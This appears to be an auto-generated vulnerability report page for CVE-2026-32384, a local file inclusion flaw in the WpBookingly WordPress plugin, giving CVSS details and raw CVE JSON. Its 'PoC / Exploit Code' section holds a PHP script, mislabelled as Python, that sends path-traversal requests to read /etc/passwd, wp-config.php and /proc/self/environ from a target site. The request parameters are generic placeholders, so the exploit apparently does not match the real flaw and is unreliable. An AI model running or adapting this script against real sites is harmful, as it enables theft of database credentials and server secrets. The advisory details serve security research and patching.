Security Vulnerability Report
中文
CVE-2026-32384 CVSS 7.5 HIGH

CVE-2026-32384

Published: 2026-03-13 19:54:54
Last Modified: 2026-04-22 21:30:26

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in magepeopleteam WpBookingly service-booking-manager allows PHP Local File Inclusion.This issue affects WpBookingly: from n/a through <= 1.2.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WpBookingly service-booking-manager <= 1.2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2026-32384 PoC - WpBookingly Local File Inclusion // Target: WordPress WpBookingly Plugin <= 1.2.9 // Type: Local File Inclusion via insecure include/require $target = 'http://target-site.com'; $plugin_path = '/wp-content/plugins/service-booking-manager/'; // Files to test for LFI $test_files = array( '../../../../../../../../etc/passwd', '../../../../../../../../wp-config.php', '../../../../../../../../../etc/hostname', '../../../../../../proc/self/environ' ); foreach ($test_files as $file) { $url = $target . $plugin_path . '?action=some_action&file=' . urlencode($file); echo "[*] Testing: $url\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && !empty($response)) { echo "[+] Vulnerable! File content:\n"; echo substr($response, 0, 500) . "\n\n"; } } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32384", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:53.633", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in magepeopleteam WpBookingly service-booking-manager allows PHP Local File Inclusion.This issue affects WpBookingly: from n/a through <= 1.2.9."}, {"lang": "es", "value": "Vulnerabilidad de control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP ('inclusión remota de ficheros PHP') en magepeopleteam WpBookingly service-booking-manager permite la inclusión local de ficheros PHP. Este problema afecta a WpBookingly: desde n/a hasta &lt;= 1.2.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/service-booking-manager/vulnerability/wordpress-wpbookingly-plugin-1-2-9-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}